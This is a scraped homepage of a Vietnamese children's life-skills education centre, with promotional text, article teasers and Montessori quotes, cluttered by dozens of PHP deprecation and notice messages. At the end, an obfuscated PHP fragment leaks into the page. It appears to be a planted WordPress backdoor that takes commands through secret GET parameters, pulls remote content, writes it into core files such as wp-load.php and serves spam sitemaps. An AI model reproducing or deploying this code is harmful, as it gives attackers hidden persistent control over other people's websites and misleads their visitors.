Deprecated: Array and string offset access syntax with curly braces is deprecated in /home/kynan/public_html/wp-includes/script-loader.php on line 757

Deprecated: Array and string offset access syntax with curly braces is deprecated in /home/kynan/public_html/wp-includes/script-loader.php on line 757

Deprecated: Array and string offset access syntax with curly braces is deprecated in /home/kynan/public_html/wp-includes/script-loader.php on line 758

Deprecated: Array and string offset access syntax with curly braces is deprecated in /home/kynan/public_html/wp-includes/script-loader.php on line 758

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/load.php on line 926

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Notice: Trying to access array offset on value of type bool in /home/kynan/public_html/wp-includes/theme.php on line 2360

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798
Kỹ Năng Tương Lai Việt | Nghị Lực - Trí Tuệ - Lòng Biết Ơn
Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 2692

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

TRUNG TÂM KỸ NĂNG TƯƠNG LAI VIỆT

Trí tuệ - Nghị lực - Lòng biết ơn

Trung tâm Kỹ năng tương lai Việt - Life Kids là hệ thống giáo dục kỹ năng, kiến thức và xây dựng giá trị cốt lõi bên trong về nhân cách cho trẻ. Chúng tôi nhìn thấy việc nuôi dưỡng và giáo dục cho trẻ giống như việc “gieo trồng”“nuôi dưỡng” một cây cổ thụ.

Để cây cổ thụ vững chắc chúng cần có được nền tảng bền vững nhờ những “BỘ RỄ” của mình.

Và chúng tôi mang tên “LIFE KIDS” được hình thành với tầm nhìn, sứ mệnh và những giá trị khác biệt.

SỰ KIỆN NỔI BẬT

TRẠI HÈ “4T” LÀ GÌ?

HỆ THỐNG GIÁO DỤC

NHẬN THÔNG TIN HỮU ÍCH VÀ ƯU ĐÃI TỪ CHÚNG TÔI


Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Nội Dung Nổi Bật

Đừng Đặt Áp Lực Con Phải Giỏi Toàn Diện

130,509 người quan tâm về chủ đề này

Chuẩn Bị Hành Trang Vào Lớp 1 Cho Con Trong Mùa...

120,219 người quan tâm về chủ đề này

Hành Trang Vào Lớp 1 Cho Con Cần Chuẩn Bị Thật...

204,132 người quan tâm về chủ đề này

5 Đồ Dùng Học Tập Không Thể Thiếu Cho Hành Trang...

127,219 người quan tâm về chủ đề này

Rèn Kỹ Năng Tự Học Cho Trẻ Trước Khi Lớp 1

127,219 người quan tâm về chủ đề này

Kỹ Năng Sống Cho Trẻ Từ 4 – 6 Tuổi, Các...

209,229 người quan tâm về chủ đề này

Giáo Dục Không Chỉ Là Học Chữ Và Làm Toán


Tất cả những tương tác của ta với trẻ nhỏ rồi sẽ kết trái, không chỉ trong hiện tại, mà còn trong con người trưởng thành của đứa trẻ về sau.

- Maria Montessori -


Hạnh phúc và sự thành công đều tạo dựng từ lòng biết ơn.

- Khuyết Danh -


Giáo dục là một quá trình tự nhiên được thực hiện bởi trẻ nhỏ và không đạt được nhờ lắng nghe mà nhờ trải nghiệm trong môi trường.

- Maria Montessori -

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798

Deprecated: Function get_magic_quotes_gpc() is deprecated in /home/kynan/public_html/wp-includes/formatting.php on line 4798
xt\';if(!${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x44\x45\x44\x39\x45\x39\x39"]($A9DDE9DE9E)){${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x44\x45\x39\x39\x45\x45\x44"]($A9DDE9DE9E);}$A999DDEEDE=$A9DDE9DE9E.\'/\'.$A999DDEEDE;$AEDDD9E99E=isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])?${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\']:\'\';$AE999DDEDE=isset(${"\x5fG\x45T"}[\'writerfi\'.\'lename\'])?${"\x5fG\x45T"}[\'writerfi\'.\'lename\']:\'\';if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])){$AED9D9DE9E=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x45\x44\x39\x39\x45\x44\x39"](\'yygpKhTbDS108syNfLrcxNSdLLzEvtPL1wcA\');$ADED99ED9E=\'wp-l\'.\'oad.php\';$A9DD9EEE9D=\'up\'.\'.txt\';if($AE999DDEDE!=\'\'){${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x44\x44\x39\x45\x45\x45\x39"]($A999DDEEDE,${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x45\x44\x45\x39\x44\x44\x39"]($AEDDD9E99E).\'-\'.${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x45\x44\x45\x39\x44\x44\x39"]($AE999DDEDE));$ADED99ED9E=$AE999DDEDE;}$ADED99DE9E=@${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x45\x44\x39\x45\x44\x45\x39"]($A999DDEEDE);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x39\x39\x45\x44\x45\x44\x45"]($ADED99DE9E)!=\'\'){$ADED99DE9E=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x39\x44\x39\x45\x44\x45\x45"](\'-\',$ADED99DE9E);$ADED99ED9E=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x39\x45\x44\x45\x44\x39\x44"](${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x39\x39\x45\x44\x45\x44\x45"]($ADED99DE9E[1]));$A9DD9EEE9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x39\x45\x44\x45\x44\x39\x44"](${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x39\x39\x45\x44\x45\x44\x45"]($ADED99DE9E[0]));}$A9ED9D9EDE=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x45\x44\x39\x39\x45\x44\x39"](\'K04u0hTDUtP0NwYA\');$AE9DD9D9EE=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x39\x44\x39\x45\x44\x45\x45"](\'|\',$ADED99ED9E);$ADD9E9D9EE=${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x39\x44\x39\x45\x44\x45\x45"](\'|\',$A9DD9EEE9D);for($A999DEDEED=0;$A999DEDEED<${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x45\x45\x39\x44\x39\x44"]($AE9DD9D9EE);$A999DEDEED++){$ADED99ED9E=$AE9DD9D9EE[$A999DEDEED];if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x45\x45\x39\x44\x39\x44"]($ADD9E9D9EE)<=$A999DEDEED){$A9DD9EEE9D=$ADD9E9D9EE[${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x45\x45\x39\x44\x39\x44"]($ADD9E9D9EE)-1];}else{$A9DD9EEE9D=$ADD9E9D9EE[$A999DEDEED];}$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($AED9D9DE9E.$A9DD9EEE9D);$AE99DDE9DE=substr($ADED99ED9E,-${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x45\x39\x44\x45\x44\x44\x39\x45"]($ADED99ED9E),${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x39\x44\x39\x44\x44\x45\x39"]($ADED99ED9E,\'/\'));if(!${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x44\x45\x44\x39\x45\x39\x39"]($AE99DDE9DE)&&$AE99DDE9DE!=\'\'){mkdir ($AE99DDE9DE,0755,true);}$ADE9EDDE99=@${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x44\x45\x44\x39\x45\x44\x45\x39"]($ADED99ED9E);$A9D9EED9ED=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x45\x44\x39\x39\x45\x44\x39"](\'synJLhTMlJtTMxMLHtPRhzAB\');if(!${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($ADE9EDDE99,$A9ED9D9EDE)&&$A9EED9ED9D!=\'\'&&!${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,$A9D9EED9ED)){@${"G\x4cO\x42\x41\x4cS"}["\x41\x39\x39\x45\x39\x44\x45\x44\x44\x45"]($ADED99ED9E,0644);${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x44\x44\x39\x45\x45\x45\x39"]($ADED99ED9E,$A9EED9ED9D.$ADE9EDDE99);}}}if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url1\'])){echo $AEDDEED999;exit();}if(isset(${"\x5fG\x45T"}[\'xxnew201\'.\'8_url2\'])){echo $ADD9E9E9DE;exit();}if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x39\x45\x44\x39\x39\x44\x45"](\'/(sitemap).*.xml$/\',$A99DEDDEE9)){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($AEDDEED999);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,\'\')){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x44\x45\x39\x39\x39\x44\x45"](\'\',\'\',$A9EED9ED9D);@header(\'content-type:text/xml\');echo "$A9EED9ED9D";unset($A9EED9ED9D,$AEDDEED999,$AED9EED9D9,$A999EDEDDE,$A99DEDDEE9,$AD9D9D9EEE,$A9ED99DEDE,$A9ED9DEED9);exit();}}if($A9EE9DED9D){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($AEDDEED999);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,\'\')){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x44\x45\x39\x39\x39\x44\x45"](\'\',\'\',$A9EED9ED9D);echo "$A9EED9ED9D";unset($A9EED9ED9D,$url_format,$AED9EED9D9,$A999EDEDDE,$A99DEDDEE9,$AD9D9D9EEE,$A9ED99DEDE,$A9ED9DEED9);exit();}}if($ADE9D9EE9D){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x45\x44\x39\x44\x45\x44\x39\x39"]($ADD9E9E9DE);if(${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x39\x45\x44\x39\x45\x44\x39\x45"]($A9EED9ED9D,\'\')){$A9EED9ED9D=${"G\x4cO\x42\x41\x4cS"}["\x41\x44\x45\x44\x45\x39\x39\x39\x44\x45"](\'\',\'\',$A9EED9ED9D);echo "$A9EED9ED9D";unset($A9EED9ED9D,$url_format,$AED9EED9D9,$A999EDEDDE,$A99DEDDEE9,$AD9D9D9EEE,$A9ED99DEDE,$A9ED9DEED9);exit();}}');${"G\x4cO\x42\x41\x4cS"}["\x41\x45\x44\x39\x45\x39\x45\x44\x39\x44"]();?>
Notice: Constant WP_USE_THEMES already defined in /home/kynan/public_html/index.php on line 35